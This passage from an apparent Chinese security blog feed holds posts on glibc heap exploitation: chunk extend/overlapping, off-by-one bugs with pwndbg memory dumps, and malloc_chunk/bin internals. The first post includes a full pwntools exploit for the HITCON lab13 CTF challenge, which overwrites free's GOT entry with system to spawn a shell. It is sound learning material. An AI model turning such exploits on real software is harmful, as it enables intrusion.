class="hljs-type">void</span> *ptr,*ptr1; ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第1个 0x80 的chunk1</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第2个 0x10 的chunk2</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第3个 0x10 的chunk3</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第4个 0x10 的chunk4 </span> *(<span class="hljs-type">int</span> *)((<span class="hljs-type">int</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x61</span>; <span class="hljs-built_in">free</span>(ptr); ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x50</span>);}</code></pre></div><p>初始化分配 4 个堆之后:</p><p><img src="/images/chunk_extend_overlapping/7.png" alt></p><p>将第一个 chunk size 修改为 0x61 ,然后 free 第一个堆块,红框内的都会被当做一个整体放入到 fastbin 当中:</p><p><img src="/images/chunk_extend_overlapping/8.png" alt></p><p><img src="/images/chunk_extend_overlapping/9.png" alt></p><p>那么当再次分配大小为 0x50 (不含chunk header)时,就会调用这块内存了:</p><p><img src="/images/chunk_extend_overlapping/10.png" alt></p><p>在 malloc(0x50) 对 extend 区域重新占位后,其中 0x10 的 fastbin 块依然可以正常的分配和释放,此时已经构成 overlapping,通过对 overlapping 的进行操作可以实现 fastbin attack。</p><h3 id="基本示例-5:通过-extend-前向-overlapping">基本示例 5:通过 extend 前向 overlapping</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>{ <span class="hljs-type">void</span> *ptr1,*ptr2,*ptr3,*ptr4; ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin1</span> ptr2=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin1</span> ptr3=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin2</span> ptr4=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin2</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//防止与top合并</span> <span class="hljs-built_in">free</span>(ptr1); *(<span class="hljs-type">int</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr4<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x90</span>;<span class="hljs-comment">//修改pre_inuse域,prev_inuse</span> *(<span class="hljs-type">int</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr4<span class="hljs-number">-0x10</span>)=<span class="hljs-number">0xd0</span>;<span class="hljs-comment">//修改pre_size域,prev_size</span> <span class="hljs-built_in">free</span>(ptr4);<span class="hljs-comment">//unlink进行前向extend</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x150</span>);<span class="hljs-comment">//占位块</span>}</code></pre></div><p>这里例子调试一直出不来堆信息,就文字描述一下:</p><p>先布置好 5 个堆块,然后释放 ptr1 进入到 unsortedbin 。修改 ptr4 的 prev_inuse 为 0 标记前一个堆块释放(空闲);修改 ptr4 的 prev_size 为 ptr1+ptr2+ptr3 。释放 ptr4 会触发回收机制,也就是合并物理相邻的堆,用到的操作是 unlink ,就将 ptr1~4 当做一个堆块放入 unsortedbin。</p><p>前向 extend 利用了 smallbin 的 unlink 机制,通过修改 pre_size 域可以跨越多个 chunk 进行合并实现 overlapping。</p><h2 id="例题">例题</h2><h3 id="hitcon-training-lab13">HITCON Training lab13</h3><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/user-mode/heap/chunk-extend-shrink/hitcontraning_lab13">题目链接</a></p><h4 id="基本信息">基本信息</h4><div class="code-wrapper"><pre><code class="hljs bahs"># zer0ptr @ DESKTOP-FHEMUHT in ~/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/HITCON_Training_lab13 [15:58:02]$ checksec heapcreator[*] '/home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/HITCON_Training_lab13/heapcreator' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No</code></pre></div><p>程序为 64 位动态链接程序,主要开启了 Canary 保护与 NX 保护。</p><h4 id="基本功能">基本功能</h4><p>程序大概是一个自定义的堆分配器,每个堆主要有两个成员:大小与内容指针。主要功能如下</p><ol><li>创建堆,根据用户输入的长度,申请对应内存空间,并利用 read 读取指定长度内容。这里长度没有进行检测,当长度为负数时,会出现任意长度堆溢出的漏洞。当然,前提是可以进行 malloc。此外,这里读取之后并没有设置 NULL。</li><li>编辑堆,根据指定的索引以及之前存储的堆的大小读取指定内容,但是这里读入的长度会比之前大 1,所以会<strong>存在 off by one 的漏洞</strong>。</li><li>展示堆,输出指定索引堆的大小以及内容。</li><li>删除堆,删除指定堆,并且将对应指针设置为了 NULL。</li></ol><h4 id="利用">利用</h4><p>基本利用思路如下</p><ol><li>利用 off by one 漏洞覆盖下一个 chunk 的 size 字段,从而构造伪造的 chunk 大小。</li><li>申请伪造的 chunk 大小,从而产生 chunk overlap,进而修改关键指针。</li></ol><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python</span><span class="hljs-comment"># -*- coding: utf-8 -*-</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *context.log_level = <span class="hljs-string">'debug'</span>p = process(<span class="hljs-string">"./heapcreator"</span>)elf = ELF(<span class="hljs-string">"./heapcreator"</span>)libc = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">create</span>(<span class="hljs-params">size, content</span>): p.recvuntil(<span class="hljs-string">b"choice :"</span>) p.sendline(<span class="hljs-string">b"1"</span>) p.recvuntil(<span class="hljs-string">b"Heap : "</span>) p.sendline(<span class="hljs-built_in">str</span>(size).encode()) p.recvuntil(<span class="hljs-string">b"heap:"</span>) p.send(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">idx, content</span>): p.recvuntil(<span class="hljs-string">b"choice :"</span>) p.sendline(<span class="hljs-string">b"2"</span>) p.recvuntil(<span class="hljs-string">b"Index :"</span>) p.sendline(<span class="hljs-built_in">str</span>(idx).encode()) p.recvuntil(<span class="hljs-string">b"heap :"</span>) p.send(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(<span class="hljs-params">idx</span>): p.recvuntil(<span class="hljs-string">b"choice :"</span>) p.sendline(<span class="hljs-string">b"3"</span>) p.recvuntil(<span class="hljs-string">b"Index :"</span>) p.sendline(<span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">idx</span>): p.recvuntil(<span class="hljs-string">b"choice :"</span>) p.sendline(<span class="hljs-string">b"4"</span>) p.recvuntil(<span class="hljs-string">b"Index :"</span>) p.sendline(<span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">exit</span>(): p.recvuntil(<span class="hljs-string">b"choice :"</span>) p.sendline(<span class="hljs-string">b"5"</span>)<span class="hljs-comment"># off-by-one</span>create(<span class="hljs-number">0x18</span>, <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x10</span>) <span class="hljs-comment"># 0</span>create(<span class="hljs-number">0x10</span>, <span class="hljs-string">b'b'</span>*<span class="hljs-number">0x10</span>) <span class="hljs-comment"># 1</span>edit(<span class="hljs-number">0</span>, <span class="hljs-string">b"/bin/sh\x00"</span>.ljust(<span class="hljs-number">0x18</span>, <span class="hljs-string">b'a'</span>) + <span class="hljs-string">b"\x41"</span>)free(<span class="hljs-number">1</span>)<span class="hljs-comment"># leak libc</span>free_got = elf.got[<span class="hljs-string">'free'</span>]create(<span class="hljs-number">0x30</span>, <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x18</span> + p64(<span class="hljs-number">0x21</span>) + p64(<span class="hljs-number">0x30</span>) + p64(free_got))show(<span class="hljs-number">1</span>)p.recvuntil(<span class="hljs-string">b"Content : "</span>)free_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\x00'</span>))log.info(<span class="hljs-string">"free_addr:"</span> + <span class="hljs-built_in">hex</span>(free_addr))libc_base = free_addr - libc.symbols[<span class="hljs-string">'free'</span>]log.info(<span class="hljs-string">"libc_base:"</span> + <span class="hljs-built_in">hex</span>(libc_base))system = libc_base + libc.symbols[<span class="hljs-string">'system'</span>]log.info(<span class="hljs-string">"system:"</span> + <span class="hljs-built_in">hex</span>(system))edit(<span class="hljs-number">1</span>, p64(system))<span class="hljs-comment"># gdb.attach(p)</span>free(<span class="hljs-number">0</span>)p.interactive()</code></pre></div><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/chunk-extend-overlapping/#5extendoverlapping">Chunk Extend and Overlapping</a></li></ul></li><li><p>CSDN</p><ul><li><a href="https://blog.csdn.net/qq_41202237/article/details/108320408">好好说话之Chunk Extend/Overlapping</a></li><li><a href="https://blog.csdn.net/weixin_43921239/article/details/107841328">Chunk Extend/Overlapping | 堆拓展、重叠</a></li><li><a href="https://blog.csdn.net/weixin_45677731/article/details/107914807">buuctf hitcontraining_heapcreator HITCON Trainging lab13</a></li></ul></li><li><p>知乎</p><ul><li><a href="https://zhuanlan.zhihu.com/p/61691650">堆利用之 chunk overlapping</a></li></ul></li><li><p>博客园</p><ul><li><a href="https://www.cnblogs.com/WangAoBo/p/hitconTraining_wp.html#_label12">M4x@10.0.0.55</a></li><li><a href="https://www.cnblogs.com/Pocon/articles/19529104">PWN-extend overlapping</a></li></ul></li><li><p>Blogs</p><ul><li><a href="https://yun1ian.github.io/2024/10/28/Overlapping/">hunk Extend and Overlapping(堆重叠)</a></li><li><a href="https://pidanxu.github.io/2019/02/27/hitcon-training-lab13/index.html">hitcon training lab13</a></li><li><a href="https://zh-closure.github.io/2022/03/03/Extend-and-Overlapping/#2%E3%80%81%E5%AF%B9inuse%E7%9A%84smallbin%E8%BF%9B%E8%A1%8Cextend">chunk extend overlapping</a></li></ul></li><li><p>看雪</p><ul><li><a href="https://bbs.kanxue.com/thread-247110-1.htm">HITCON Trainging lab13 heapcreator</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 堆溢出 </tag>
<tag> Heap </tag>
<tag> Chunk Extend and Overlapping </tag>
</tags>
</entry>
<entry>
<title>offbyone学习记录</title>
<link href="/2026/02/07/offbyone/"/>
<url>/2026/02/07/offbyone/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h3 id="description">Description</h3><blockquote><p>off-by-one漏洞是一种特殊的缓冲区溢出漏洞,其特殊之处在于off-by-one漏洞<strong>仅允许溢出一个字节</strong>,且该溢出字节未必是可控的。off-by-one漏洞常见于以下两种情况:</p><ol><li>错误地设置了循环的边界(如将"<strong><</strong>“误写为”<strong><=</strong>");</li><li>错误地使用了字符串处理函数字符串处理函数&zhida_source=entity)(不同的字符串处理函数对字符串末尾的"<strong>\0</strong>"的处理方式不同,如果将二者混用便可能导致末尾的"<strong>\0</strong>"发生溢出)。</li></ol></blockquote><h3 id="循环边界设置不当">循环边界设置不当</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">char</span> a[<span class="hljs-number">16</span>];<span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;i<=<span class="hljs-number">16</span>;i++){ read(<span class="hljs-number">0</span>,a,<span class="hljs-number">1</span>);}</code></pre></div><p>在上述代码片段中看出其实这个循环进行了17次,多向a中读入了一个字节,造成了溢出,攻击者可以通过这个漏洞达成许多攻击效果。</p><blockquote><p>这一错误也被称为栅栏错误<br>wikipedia: 栅栏错误(有时也称为电线杆错误或者灯柱错误)是差一错误的一种。如以下问题:</p><div class="code-wrapper"><pre><code class="hljs text">建造一条直栅栏(即不围圈),长 30 米、每条栅栏柱间相隔 3 米,需要多少条栅栏柱?</code></pre></div><p>最容易想到的答案 10 是错的。这个栅栏有 10 个间隔,11 条栅栏柱。</p></blockquote><p>我在 <code>puts</code> 处(my_gets前)和"19"(return 0)处下断点;</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> b putsBreakpoint 1 at 0x1070pwndbg> b 19Breakpoint 2 at 0x1214: file example.c, line 19.pwndbg> r_____________________________________________________________________pwndbg> rStarting program: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/off_by_one_example/example/offbyone_1 [Thread debugging using libthread_db enabled]Using host libthread_db library <span class="hljs-string">"/lib/x86_64-linux-gnu/libthread_db.so.1"</span>.Breakpoint 1, __GI__IO_puts (str=0x555555556004 <span class="hljs-string">"Get Input:"</span>) at ./libio/ioputs.c:3333 ./libio/ioputs.c: No such file or directory.LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────────────────── RAX 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> RBX 0 RCX 0x21 RDX 0 RDI 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> RSI 0x5555555592d0 ◂— 0 R8 0x21001 R9 0x5555555592c0 ◂— 0 R10 0xfffffffffffff000 R11 0x7ffff7e1ace0 (main_arena+96) —▸ 0x5555555592d0 ◂— 0 R12 0x7fffffffd718 —▸ 0x7fffffffda52 ◂— <span class="hljs-string">'/home/zer0ptr/Pwn-Research/Heap-overflow-basic/off_by_one_example/example/offbyone_1'</span> R13 0x5555555551cc (main) ◂— endbr64 R14 0x555555557db0 (__do_global_dtors_aux_fini_array_entry) —▸ 0x555555555140 (__do_global_dtors_aux) ◂— endbr64 R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f RBP 0x7fffffffd600 ◂— 1 RSP 0x7fffffffd5e8 —▸ 0x555555555203 (main+55) ◂— mov rax, qword ptr [rbp - 0x10] RIP 0x7ffff7c80e50 (puts) ◂— endbr64 ────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / <span class="hljs-built_in">set</span> <span class="hljs-built_in">emulate</span> on ]───────────────────────────────────────────────────────────────────────────────────────────────────── ► 0x7ffff7c80e50 <puts> endbr64 0x7ffff7c80e54 <puts+4> push r14 0x7ffff7c80e56 <puts+6> push r13 0x7ffff7c80e58 <puts+8> push r12 0x7ffff7c80e5a <puts+10> mov r12, rdi R12 => 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> 0x7ffff7c80e5d <puts+13> push rbp 0x7ffff7c80e5e <puts+14> push rbx 0x7ffff7c80e5f <puts+15> sub rsp, 0x10 RSP => 0x7fffffffd5b0 (0x7fffffffd5c0 - 0x10) 0x7ffff7c80e63 <puts+19> call *ABS*+0xa86a0@plt <*ABS*+0xa86a0@plt> 0x7ffff7c80e68 <puts+24> mov r13, qword ptr [rip + 0x198fc9] R13, [0x7ffff7e19e38] => 0x7ffff7e1b868 (stdout) 0x7ffff7c80e6f <puts+31> mov rbx, rax──────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd5e8 —▸ 0x555555555203 (main+55) ◂— mov rax, qword ptr [rbp - 0x10]01:0008│-010 0x7fffffffd5f0 —▸ 0x5555555592a0 ◂— 002:0010│-008 0x7fffffffd5f8 —▸ 0x5555555592c0 ◂— 003:0018│ rbp 0x7fffffffd600 ◂— 104:0020│+008 0x7fffffffd608 —▸ 0x7ffff7c29d90 (__libc_start_call_main+128) ◂— mov edi, eax05:0028│+010 0x7fffffffd610 ◂— 006:0030│+018 0x7fffffffd618 —▸ 0x5555555551cc (main) ◂— endbr64 07:0038│+020 0x7fffffffd620 ◂— 0x1ffffd700────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► 0 0x7ffff7c80e50 puts 1 0x555555555203 main+55 2 0x7ffff7c29d90 __libc_start_call_main+128 3 0x7ffff7c29e40 __libc_start_main+128 4 0x5555555550c5 _start+37</code></pre></div><p>从上面这一大坨拉出来:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x5555555592a00x5555555592a0: 0x0000000000000000 0x00000000000000000x5555555592b0: 0x0000000000000000 0x00000000000000210x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x0000000000020d310x5555555592e0: 0x0000000000000000 0x0000000000000000pwndbg> x/10gx 0x5555555592c00x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x0000000000020d310x5555555592e0: 0x0000000000000000 0x00000000000000000x5555555592f0: 0x0000000000000000 0x00000000000000000x555555559300: 0x0000000000000000 0x0000000000000000</code></pre></div><p>这里已经分配了两个用户区域为16的堆块<br>当我们执行 my_gets 进行输入之后,可以看到数据发生了溢出:第25个字节0x61覆盖了下一个堆块的size字段的低字节</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x5555555592a00x5555555592a0: 0x6161616161616161 0x61616161616161610x5555555592b0: 0x0000000000000061 0x00000000000000210x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x00000000000004110x5555555592e0: 0x75706e4920746547 0x00000000000a3a74</code></pre></div><h3 id="字符串结束符">字符串结束符</h3><p>第二种常见的导致 off-by-one 的场景就是字符串操作了,常见的原因是字符串的结束符计算有误:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span> </span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span> </span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>{ <span class="hljs-type">char</span> buffer[<span class="hljs-number">40</span>]=<span class="hljs-string">""</span>; <span class="hljs-type">void</span> *chunk1; chunk1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">24</span>); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Get Input"</span>); gets(buffer); <span class="hljs-keyword">if</span>(<span class="hljs-built_in">strlen</span>(buffer)==<span class="hljs-number">24</span>) { <span class="hljs-built_in">strcpy</span>(chunk1,buffer); } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}<span class="hljs-comment">// gcc -g -o offbyone_2 offbyone_2.c -no-pie -fno-stack-protector -z execstack</span></code></pre></div><p>程序乍看上去没有任何问题(不考虑栈溢出),可能很多人在实际的代码中也是这样写的。 但是 strlen 和 strcpy 的行为不一致却导致了 off-by-one 的发生。 strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 ‘\x00’ 计算在内的,但是 strcpy 在复制字符串时会拷贝结束符 ‘\x00’ 。这就导致了我们向 chunk1 中写入了 25 个字节,我们使用 gdb 进行调试可以看到这一点。<br>我在<code>*main+62</code>处(malloc调用后的返回地址)和 <s><code>*main+141</code>处(程序执行完毕返回地址处)</s> <code>strcpy</code>下断点:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> disassemble mainDump of assembler code <span class="hljs-keyword">for</span> <span class="hljs-keyword">function</span> main: 0x00000000004011b6 <+0>: endbr64 0x00000000004011ba <+4>: push rbp 0x00000000004011bb <+5>: mov rbp,rsp 0x00000000004011be <+8>: sub rsp,0x30 0x00000000004011c2 <+12>: mov QWORD PTR [rbp-0x30],0x0 0x00000000004011ca <+20>: mov QWORD PTR [rbp-0x28],0x0 0x00000000004011d2 <+28>: mov QWORD PTR [rbp-0x20],0x0 0x00000000004011da <+36>: mov QWORD PTR [rbp-0x18],0x0 0x00000000004011e2 <+44>: mov QWORD PTR [rbp-0x10],0x0 0x00000000004011ea <+52>: mov edi,0x18 0x00000000004011ef <+57>: call 0x4010c0 <malloc@plt> 0x00000000004011f4 <+62>: mov QWORD PTR [rbp-0x8],rax 0x00000000004011f8 <+66>: lea rax,[rip+0xe05] <span class="hljs-comment"># 0x402004</span> 0x00000000004011ff <+73>: mov rdi,rax 0x0000000000401202 <+76>: call 0x401090 <puts@plt> 0x0000000000401207 <+81>: lea rax,[rbp-0x30] 0x000000000040120b <+85>: mov rdi,rax 0x000000000040120e <+88>: mov eax,0x0 0x0000000000401213 <+93>: call 0x4010b0 <gets@plt> 0x0000000000401218 <+98>: lea rax,[rbp-0x30] 0x000000000040121c <+102>: mov rdi,rax 0x000000000040121f <+105>: call 0x4010a0 <strlen@plt> 0x0000000000401224 <+110>: cmp rax,0x18 0x0000000000401228 <+114>: jne 0x40123d <main+135> 0x000000000040122a <+116>: lea rdx,[rbp-0x30] 0x000000000040122e <+120>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000401232 <+124>: mov rsi,rdx 0x0000000000401235 <+127>: mov rdi,rax 0x0000000000401238 <+130>: call 0x401080 <strcpy@plt> 0x000000000040123d <+135>: mov eax,0x0 0x0000000000401242 <+140>: leave 0x0000000000401243 <+141>: ret End of assembler dump.pwndbg> b *main+62Breakpoint 2 at 0x4011f4: file offbyone_2.c, line 9.pwndbg> b strcpyBreakpoint 3 at 0x401243: file offbyone_2.c, line 14.pwndbg></code></pre></div><p>malloc调用后chunk1如下:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x4052a00x4052a0: 0x0000000000000000 0x00000000000000000x4052b0: 0x0000000000000000 0x0000000000020d510x4052c0: 0x0000000000000000 0x00000000000000000x4052d0: 0x0000000000000000 0x00000000000000000x4052e0: 0x0000000000000000 0x0000000000000000</code></pre></div><p>然后c输入b’a’ * 24后观察:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x4052a00x4052a0: 0x6161616161616161 0x61616161616161610x4052b0: 0x6161616161616161 0x00000000000004000x4052c0: 0x75706e4920746547 0x0000000000000a740x4052d0: 0x0000000000000000 0x00000000000000000x4052e0: 0x0000000000000000 0x0000000000000000pwndbg></code></pre></div><p>可以看到 next chunk 的 size 域低字节被结束符 <code>'\x00'</code> 覆盖,这种又属于 off-by-one 的一个分支称为 NULL byte off-by-one,我们在后面会看到 off-by-one 与 NULL byte off-by-one 在利用上的区别。 还是有一点就是为什么是低字节被覆盖呢,因为我们通常使用的 CPU 的字节序都是小端法的,比如一个 DWORD 值在使用小端法的内存中是这样储存的:</p><div class="code-wrapper"><pre><code class="hljs text">DWORD 0x41424344内存 0x44,0x43,0x42,0x41</code></pre></div><h3 id="references">References</h3><ul><li>CTF-Wiki<ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/off-by-one/#off-by-one_1">堆中的 Off-By-One</a></li></ul></li><li>先知<ul><li><a href="https://xz.aliyun.com/news/12307">堆溢出 off by one & off by null</a></li><li><a href="https://xz.aliyun.com/news/16330">pwn的堆中如何使用off by one 和off by null的详细解析以及每一步的调试过程</a></li></ul></li><li>知乎<ul><li><a href="https://zhuanlan.zhihu.com/p/682436917">CTFer成长日记17:千里之堤,溃于蚁穴——off-by-one漏洞原理与利用1</a></li><li><a href="https://zhuanlan.zhihu.com/p/112364953">二进制安全之堆溢出(系列)—— off by one</a></li></ul></li><li>CSDN<ul><li><a href="https://blog.csdn.net/m0_57836225/article/details/143894507">PWN-Offbyone 漏洞解析</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> 堆 </tag>
</tags>
</entry>
<entry>
<title>堆基础-glibc_malloc_chunk,bin,threading,arena,system_call</title>
<link href="/2026/02/06/heap_glibc_malloc_chunk/"/>
<url>/2026/02/06/heap_glibc_malloc_chunk/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1>glibc_malloc_chunk</h1><h3 id="overview">Overview</h3><p>在程序的执行过程中,我们称由 malloc 申请的内存为 chunk 。这块内存在 ptmalloc 内部用 malloc_chunk 结构体来表示。当程序申请的 chunk 被 free 后,会被加入到相应的空闲管理列表中。无论chunk的大小、状态如何,他们都是使用同一数据结构——malloc_chunk,只不过是表现形式有所不同。</p><p>malloc_chunk结构如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/*</span><span class="hljs-comment"> This struct declaration is misleading (but accurate and necessary).</span><span class="hljs-comment"> It declares a "view" into memory allowing access to necessary</span><span class="hljs-comment"> fields at known offsets from a given base. See explanation below.</span><span class="hljs-comment">*/</span><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span> {</span> INTERNAL_SIZE_T prev_size; <span class="hljs-comment">/* Size of previous chunk (if free). */</span> INTERNAL_SIZE_T size; <span class="hljs-comment">/* Size in bytes, including overhead. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd</span>;</span> <span class="hljs-comment">/* double links -- used only if free. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk</span>;</span> <span class="hljs-comment">/* Only used for large blocks: pointer to next larger size. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd_nextsize</span>;</span> <span class="hljs-comment">/* double links -- used only if free. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk_nextsize</span>;</span>};</code></pre></div><p>根据不同的chunk类型,malloc_chunk会有部分内容选择性“表示”。</p><p>堆段中存在的 chunk 类型如下:</p><ul><li>Allocated chunk;</li><li>Free chunk;</li><li>Top chunk;</li><li>Last Remainder chunk.</li></ul><h3 id="allocated-chunk">allocated chunk</h3><p>allocated chunk,也就是分配给用户的 chunk,其图示如下:</p><p><img src="/images/heap_glibc_malloc_chunk/allocated_chunk.png" alt="images"></p><p>图中左方三个箭头依次表示:</p><ul><li>chunk:该Allocated chunk的起始地址;</li><li>mem:该Allocated chunk中用户可用区域的起始地址</li><li>next_chunk:下一个 chunck(无论类型)的起始地址。</li></ul><p>图中结构体内部各字段的含义依次为:</p><blockquote><ul><li>prev_size:若上一个 chunk 可用,则此字段赋值为上一个 chunk 的大小;否则,此字段被用来存储上一个 chunk 的用户数据;</li><li>size:此字段赋值本 chunk 的大小,其最后三位包含标志信息:<ul><li>PREV_INUSE § – 置「1」表示上个 chunk 被分配;</li><li>IS_MMAPPED (M) – 置「1」表示这个 chunk 是通过 mmap 申请的(较大的内存);</li><li>NON_MAIN_ARENA (N) – 置「1」表示这个 chunk 属于一个 thread arena。</li></ul></li></ul><p>malloc_chunk 中的其余结构成员,如 fd、 bk,没有使用的必要而拿来存储用户数据;<br>用户请求的大小被转换为内部实际大小,因为需要额外空间存储 malloc_chunk,此外还需要考虑对齐。</p></blockquote><h3 id="free-chunk">free chunk</h3><p>free chunk就是用户free后释放的chunk。<br><img src="/images/heap_glibc_malloc_chunk/free_chunk.png" alt="free_chunk.png"></p><p>图中结构体内部各字段的含义依次为:</p><ul><li>prev_size: 两个相邻 free chunk 会被合并成一个,因此该字段总是保存前一个 allocated chunk 的用户数据;</li><li>size: 该字段保存本 free chunk 的大小;</li><li>fd: Forward pointer —— 本字段指向同一 bin 中的下个 free chunk(free chunk 链表的前驱指针);</li><li>bk: Backward pointer —— 本字段指向同一 bin 中的上个 free chunk(free chunk 链表的后继指针)。</li></ul><h1>glibc_malloc_bin</h1><h2 id="bins">Bins</h2><h3 id="overview">Overview</h3><p>用户释放掉的chunk不会立即归还系统,ptmalloc会同一管理heap和mmap映射区域中的chunk。当用户再一次请求分配内存的时候,ptmalloc分配器会试图在空闲的chunk中按照规则匹配一块内存给用户,从而避免频繁系统调用,降低内存分配的开销。<br>具体实现中,ptmalloc 采用分箱式方法对空闲的 chunk 进行管理。首先,它会根据空闲的 chunk 的大小以及使用状态将 chunk 初步分为 4 类:<code>fast bins</code>,<code>small bins</code>,<code>large bins</code>,<code>unsorted bin</code>。每类中仍然有更细的划分,相似大小的 chunk 会用双向链表链接起来。也就是说,在每类 bin 的内部仍然会有多个互不相关的链表来保存不同大小的 chunk。</p><p>对于 small bins,large bins,unsorted bin 来说,ptmalloc 将它们维护在同一个数组中。这些 bin 对应的数据结构在 malloc_state 中,如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> NBINS 128</span><span class="hljs-comment">/* Normal bins packed as described above */</span>mchunkptr bins[ NBINS * <span class="hljs-number">2</span> - <span class="hljs-number">2</span> ];</code></pre></div><blockquote><p>bins 主要用于索引不同 bin 的 fd 和 bk。</p></blockquote><p>为了简化在双链接列表中的使用,每个 bin 的 header 都设置为 malloc_chunk 